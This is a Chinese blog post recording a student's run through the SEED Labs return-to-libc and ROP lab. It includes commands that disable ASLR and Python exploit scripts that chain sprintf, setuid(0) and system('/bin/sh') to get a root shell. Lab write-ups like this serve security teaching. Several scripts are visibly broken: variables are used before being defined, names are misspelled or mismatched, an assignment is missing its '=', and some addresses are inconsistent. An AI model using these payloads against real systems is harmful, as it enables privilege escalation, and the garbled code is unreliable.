【SEED Labs 2.0】Return-to-libc Attack and ROP

最新推荐文章于 2024-01-12 20:04:59 发布
最新推荐文章于 2024-01-12 20:04:59 发布
阅读量4.6k 收藏 13
点赞数 5
分类专栏: SEED Labs 文章标签: 信息安全 rop libc 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39678161/article/details/119908108
版权

本文为 SEED Labs 2.0 - Return-to-libc Attack Lab 的实验记录。

实验原理

img

Task 1: Finding out the Addresses of libc Functions

关闭地址随机化

$ sudo sysctl -w kernel.randomize_va_space=0

修改链接

$ sudo ln -sf /bin/zsh /bin/sh

使用 gdb调试

$ touch badfile
$ make
$ gdb -q retlib
gdb-peda$ break main
gdb-peda$ run
gdb-peda$ p system
gdb-peda$ p exit
gdb-peda$ quit

得到结果

image-20210713150033546

Task 2: Putting the shell string in the memory

新建 MYSHELL 环境变量

image-20210713151640310

编写程序 prtenv.c

#include<stdlib.h>
#include<stdio.h>

void main(){
	char* shell = getenv("MYSHELL");
	if (shell)
	printf("%x\n", (unsigned int)shell);
}

编译并运行。然后把上面的程序段加进 retlib.c 再次编译运行。

由于 prtenv 和 retlib 都是 6 个字母,所以会得到同样的结果,如下所示。

image-20210713152415930

Task 3: Launching the Attack

根据前面得到的结果,将程序改为

#!/usr/bin/env python3
import sys

# Fill content with non-zero values
content = bytearray(0xaa for i in range(300))

X = Y+8
sh_addr = 0xffffd403 # The address of "/bin/sh"
content[X:X+4] = (sh_addr).to_bytes(4,byteorder='little')

Y = 28
system_addr = 0xf4e12420 # The address of system()
content[Y:Y+4] = (system_addr).to_bytes(4,byteorder='little')

Z = Y+4
exit_addr = 0xf7e04f80 # The address of exit()
content[Z:Z+4] = (exit_addr).to_bytes(4,byteorder='little')

# Save content to a file
with open("badfile", "wb") as f:
f.write(content)

其中,Y 的值为 0xffffcd78 − - 0xffffcd60 + 4 +4 +4

运行,攻击成功

image-20210713163255852

Attack variation 1: Is the exit() function really necessary? Please try your attack without including
the address of this function in badfile. Run your attack again, report and explain your observations.

根据 task 要求,我们将 exploit.py 中 exit 的部分注释掉,然后重新运行。

image-20210713164335438

发现可以正常提权,但退出时会崩溃。

Attack variation 2: After your attack is successful, change the file name of retlib to a different name,
making sure that the length of the new file name is different. For example, you can change it to newretlib.
Repeat the attack (without changing the content of badfile). Will your attack succeed or not? If it does
not succeed, explain why.

根据 task 要求,我们先将编译后的二进制文件改名为 rrtlib,提权成功

image-20210713164933154

在改为 newretlib,提权不成功

image-20210713165133449

由此可见,这与程序名的长度有关。

Task 4: Defeat Shell’s countermeasure

改回链接

$ sudo ln -sf /bin/dash /bin/sh

为了使攻击更加方便,我们直接使用 ROP。首先获取所需要的 libc 函数地址

image-20210714042907866

然后 disas bof 获取 bof() 函数返回地址

image-20210714043032853

同时我们还有 retlib 打印出的 bof() 函数 ebp 位置和 MYSHELL 地址,根据这些修改 exploit.py

# !/usr/bin/python3
import sys

def tobytes (value):
    return (value).to_bytes(4, byteorder= 'little')

content bytearray(0xaa for i in range (24))

sh_addr = 0xffffd3e3
leaveret = 0x565562ce
sprintf_addr = 0xf7e20e40
setuid_addr = 0xf7e99e30
system_addr = 0xf7e12420
exit_addr = 0xf7e4f80
ebp_bof = 0xffffcd58

# setuid()'s 1st argument
sprintf_argl = ebp_bof + 12 + 5*0x20

# a byte that contains 0x00
sprintf_arg2 = sh_addr + len("/bin/sh")

# Use leaveret to return to the first sprintf()
ebp_next = ebp_bof + 0x20
content += tobytes(ebp_next)
content += tobytes(leaveret)
content += b'A' * (0x20 - 2*4)

# sprintf(sprintf_argl, sprintf_arg2)
for i in range(4):
    ebp_next += 0x20
    content += tobytes(ebp_next)
    content += tobytes(sprintf_addr)
    content += tobytes(leaveret)
    content += tobytes(sprintf_arg1)
    content += tobytes(sprintf_arg2)
    content += b'A' * (0x20 - 5*4)
    sprintf_argl += 1

# setuid(0)
ebp_next += 0x20
content += tobytes(ebp_next)
content += tobytes(setuid_addr)
content += tobytes(leaveret)
content += tobytes(0xFFFFFFFF)
content += b'A' * (0x20 - 4*4)

# system("/bin/sh")
ebp_next += 0x20
content += tobytes(ebp_next)
content += tobytes(system_addr)
content += tobytes(leaveret)
content += tobytes(sh_addr)
content += b'A' * (0x20 - 4*4)

# exit()
content += tobytes(0xFFFFFFFF)
content += tobytes(exit_addr)

# Write the content to a file
with open("badfile", "wb") as f:
    f.write (content)

在上面的程序中,有以下几点:

  • 先调用 setuid(0) ,然后再调用 system("/bin/sh"),以绕过 countermeasure
  • 由于参数的 0 无法复制,所以我们调用四次 sprintf() 来生成 0

运行程序,可以看到成功提权

image-20210714044535215

Task 5: Return-Oriented Programming

由于我们上一个 Task 已经使用了 ROP,所以这一个 Task 只要稍作修改即可。

先获取 foo() 地址

image-20210714052533803

然后修改 exploit.py

# !/usr/bin/python3
import sys

def tobytes (value):
    return (value).to_bytes(4, byteorder= 'little')

content bytearray(0xaa for i in range (24))

sh_addr = 0xffffd3e3
leaveret = 0x565562ce
sprintf_addr = 0xf7e20e40
setuid_addr = 0xf7e99e30
system_addr = 0xf7e12420
exit_addr = 0xf7e4f80
ebp_bof = 0xffffcd58
foo_addr = 0x565562d0 # CHANGED!

# setuid()'s 1st argument
sprintf_argl = ebp_bof + 12 + 5*0x20

# a byte that contains 0x00
sprintf_arg2 = sh_addr + len("/bin/sh")

# Use leaveret to return to the first sprintf()
ebp_next = ebp_bof + 0x20
content += tobytes(ebp_next)
content += tobytes(leaveret)
content += b'A' * (0x20 - 2*4)

# sprintf(sprintf_argl, sprintf_arg2)
for i in range(4):
    ebp_next += 0x20
    content += tobytes(ebp_next)
    content += tobytes(sprintf_addr)
    content += tobytes(leaveret)
    content += tobytes(sprintf_arg1)
    content += tobytes(sprintf_arg2)
    content += b'A' * (0x20 - 5*4)
    sprintf_argl += 1

# setuid(0)
ebp_next += 0x20
content += tobytes(ebp_next)
content += tobytes(setuid_addr)
content += tobytes(leaveret)
content += tobytes(0xFFFFFFFF)
content += b'A' * (0x20 - 4*4)

for i in range(10): # CHANGED!
    ebp += 0x20
    content += tobytes(ebp_next)
    content += tobytes(foo_addr)
    content += tobytes(leveret)
    content += b'A'*(0x20-3*4)

# system("/bin/sh")
ebp_next += 0x20
content += tobytes(ebp_next)
content += tobytes(system_addr)
content += tobytes(leaveret)
content += tobytes(sh_addr)
content += b'A' * (0x20 - 4*4)

# exit()
content += tobytes(0xFFFFFFFF)
content += tobytes(exit_addr)

# Write the content to a file
with open("badfile", "wb") as f:
    f.write (content)

运行程序,可以看到调用了 10 次 foo() ,并成功提权

image-20210714052903073

实验总结

实验总体难度一般。Task1 - 3 依葫芦画瓢即可,没有难度;Task4 难度较大,但我大炮轰蚊子,直接用 ROP 解决了 0 如何输入的问题;由此一来,Task5 就很容易解决了。

ch3nyang
关注
  • 5
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
labs-zap-search:DCP分区应用程序搜索的搜索应用程序
04-30
Zap搜索 一个雄心勃勃的Web应用程序,用于过滤和查看存储在DCP的分区应用程序门户(ZAP)中的NYC土地使用应用程序记录。 开发设置 1.安装必备工具 (使用npm) 2.安装前端和后端软件包 > git clone https://github.com/NYCPlanning/labs-zap-search > cd labs-zap-search/client > yarn > cd labs-zap-search/server > yarn 3.设置SSL和环境文件 克隆此仓库,并按照其自述文件中的步骤进行操作: : 请注意,步骤1在local-cert-generator server.key生成了两个文件: server.key和server.crt 。 稍后,您将需要将这些文件复制/粘贴到labs-zap-search库中以运行该应用程序。 使用管理员权限/et
LFS258-Labs_V2018-08-06.pdf
07-20
LFS258-Labs_V2018-08-06 官方实验手册 不知道怎么写资源描述,凑50个字数。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
信息安全工程师-选择题(一)
予挚之的博客
02-10 2498
选择题 1.《中华人民共和国网络安全法》第五十八条明确规定,因维护国家安全和社会公共秩序,处置重大突发社会安全事件的需要,经( )决定或者批准,可以在特定区域对网络通信采取限制等临时措施。 A 国务院 B 国家网信部门 C 省级以上人民政府 D 网络服务提供商 2.2018年10月,含有我国SM3杂凑算法的IS0/IEC10118-3: 2018《信息安全技术杂凑函数第3部分:专用杂凑函数》由国际标准化组织(ISO)发布,SM3算法正式...
SeedLab-ReturnToLibc
qq_40712959的博客
12-31 960
Lab Overview 这个实验的学习目标是给学生体验有趣的缓冲区溢出攻击的变体,这种攻击攻击能够绕过实现在大多数linux操作系统上的保护机制。一种常见的利用BufferOverflow漏洞的方法是利用一段shellcode溢出buffer,然后使漏洞程序跳转到保存在栈上的shellcode,并执行shellcode,参考BufferOverflow漏洞。为了防止这种类型的攻击,一些操作系统允...
信息安全 SEED Lab5 Return-to-libc Attack Lab
crazyliu的博客
05-05 1928
首先在实验的最开始我们把对抗缓冲区溢出攻击的措施关闭,关闭地址随机化的代码如下 sudo sysctl -w kernel.randomize_va_space=0 使用如下命令去编译代码,可以禁用编译器的栈保护 gcc -fno-stack-protector example.c 使用如下命令去编译代码,可以指定是否可执行栈上代码 For executable stack: $ gcc -z execstack -o test test.c For non-executable stac
信息安全-科软课程】Lab6 Return-to-libc Attack
weixin_41950078的博客
05-03 917
目录 1.0 前言 2.0实验任务 2.1关闭对策 2.2易受攻击程序 2.3 task1找出libc函数的地址 2.4 task2 将shell字符串放入内存 ​ 2.5 task3利用缓冲区溢出漏洞 2.6 task4打开地址随机化 2.7 task5 击败shell的对策 1.0 前言 本实验的学习目标是让学生获得一种有趣的缓冲区溢出攻击变体的第一手经验;这种攻击可以绕过目前在主要Linux操作系统中实施的现有保护方案。利用缓冲区溢出漏洞的一种常见方法是用恶意外壳代码溢出...
漏洞挖掘——实验10 Return-to-libc Attack Lab
一半西瓜的博客
04-17 3751
题目 Lab Return-to-libc Attack Lab Pre 1、名词解释:ARP cache poisoning,ICMP Redirect Attack,SYN Flooding Attack,TCP Session Hijacking。如果想监听局域网内另外一台机器,一般先要进行什么步骤? 2、阅读下面这篇文章并且了解Netwox/Netwag的基本操作: Netwox...
seed-labs(return-to-libc)
u011632676的博客
06-18 929
软件安全-return-to-libc概要 概要 缓冲区溢出漏洞是把恶意代码注入到目标程序栈中发动攻击。为了抵御这种攻击,操作系统采用一个称为不可执行栈 的防御措施。这种防御措施能被另一种无须在栈中运行代码的攻击方法绕过,这种方法叫return-to-libc攻击。 shellcode.c #include <string.h> const char code[] = "\x31\xc0" "\x50" "\x68""//sh" "\x68""/bin"
SEEDLab Environment Variable and Set-UID Program Lab 实验报告
C_Ronaldo__的博客
01-12 2318
文章目录task1 Manipulating Environment Variablestask2 Passing Environment Variables from Parent Process to Child Processfork函数解析实验内容:实验tips:task3 Environment Variables and execve()task4 Environment Variables and system()system函数解析实验过程task5 Environment Variabl
复旦大学_软件安全_SEED labs_2-Return_to_libc.zip
06-27
复旦大学_软件安全_SEED labs_2-Return_to_libc实验 是从雪城大学SEED labs上找的实验 资源包括:原始文件夹、攻击代码、实验报告详细版
现代大学英语精读第二版(第六册)学习笔记(原文及全文翻译)——5 - At War with the Planet(与地球的战争)
热门推荐
预见未来to50的专栏
11-22 1万+
Unit 5 - At War with the Planet At War with the Planet Barry Commoner People live in two worlds. Like all living things, we inhabit the natural world created over the Earth's 5-billion-year history by physical, chemical, and biological processes. The ot
XSS 绕过过滤器大全,
weixin_33737134的博客
01-04 4220
XSS 绕过过滤器大全, 收集、速查表、汇总 XSS Filter Evasion Cheat Sheet 介绍(Introduction): 翻译:落泪红尘 r00ts www.sh3llc0de.com 翻译了一点,有时间再全部翻译 https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Shee...
Return to Libc Attack
大草的博客
05-19 1563
我们利用缓冲区漏洞,将恶意代码shellcode附加在缓冲区的后面。通过覆盖返回地址,跳转到恶意代码,执行栈中的shellcode代码。但是,现在的操作系统已经作出防御,禁止栈中的数据作为代码执行。但是这个并没有关系,我们可以不在栈中执行程序,我们可以通过覆盖返回地址,执行已经在内存中存在的程序,比如说libc中的system函数。我们希望跳转之后,可以执行system("/bin/sh")。这个做法的难点是,在哪里放置"/bin/sh"的地址,作为system的参数。
什么是ROP系统攻击
WH的博客
12-17 3072
文章目录ROP系统攻击初步了解寄存器内存管理常见汇编指令再究ROP攻击 ROP系统攻击初步了解 ROP全称为Return-oriented Programming(面向返回的编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构成恶意代码。 ROP的核心思想 (1)攻击者扫描已有的动态链接库和可执行文件,提取出可以利用的指令片段(gadget),这些指令片段均以ret指令结尾,即用ret指令实现指令片段执行流的衔接。 (2)操作系统通过栈来进行函数的调用和返回。函数
SEED-labs Return-to-libc
最新发布
m0_51357657的博客
01-12 868
此外,为了进一步防范缓冲区溢出攻击及其它利用 shell 程序的攻击,许多 shell 程序在被调用时自动放弃它们的特权。简单的说,既然栈中的指令不能执行,我们可以找到libc中的函数去执行,这样就绕过了数据不可执行的问题了。ret2libc的精髓之处在于,把ret addr修改成libc库中的函数地址,并且构造了system函数的参数。构造ROP的核心在于利用了指令集中的 ret 指令,改变了指令流的执行顺序。构造攻击链第一步就是找到可利用的函数system()有了前两步得到的,就可以构造攻击脚本了。
seedlab:return-to-libc
pang241的专栏
06-20 3105
声明:该教程是根据Seed Lab: return-to-libc的实验要求所写的,该教程只是演示了一下return-to-libc的一些基本的攻击原理,由于关了编译器及系统的一些保护措施,所以并不能在实际的情况下实现攻击(′▽`〃)一:背景介绍DEP数据执行保护溢出攻击的根源在于现代计算机对数据和代码没有明确区分这一先天缺陷,就目前来看重新去设计计算机体系结构基本上是不可能的,我们只能靠向前兼容的
软件安全实验——lab9(缓冲区溢出:return-to-libc绕过非可执行堆栈)
Onlyone_1314的博客
08-11 829
目录标题1、实验室概况2、实验室任务2.1初始设置2.2脆弱程序2.3任务1:利用漏洞(1) 编译程序(2)找到“\bin\sh”的地址(3)查找libc函数的地址:(4)确定输入和bof函数的返回地址的距离(5)攻击代码(6)攻击Task 1附加任务(1)pop %esp(2)按照下图构造地址序列:(3)/bin/sh和/usr/bin/的地址(4)system函数和setuid函数的地址(5)确定输入和bof函数的返回地址的距离(6)修改buf数组大小(7)在Bof函数返回的地址设断点(8)攻击3、指导
upload-labs-docker-main如何配置
04-18
对于这个问题,我会尽力为您提供帮助。upload-labs-docker-main 是一个 Docker 环境,用于运行 Upload-labs 的题目,所以需要先安装 Docker 。然后可以通过以下步骤配置: 1. 克隆 upload-labs-docker-main 项目到本地; 2. 进入 upload-labs-docker-main 目录; 3. 执行 `docker-compose up -d` 命令启动 Docker 环境; 4. 访问 http://localhost:8000/ 即可进入 Upload-labs 系统。 希望我的回答对您有所帮助。如果您还有其他问题,我会尽力为您解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值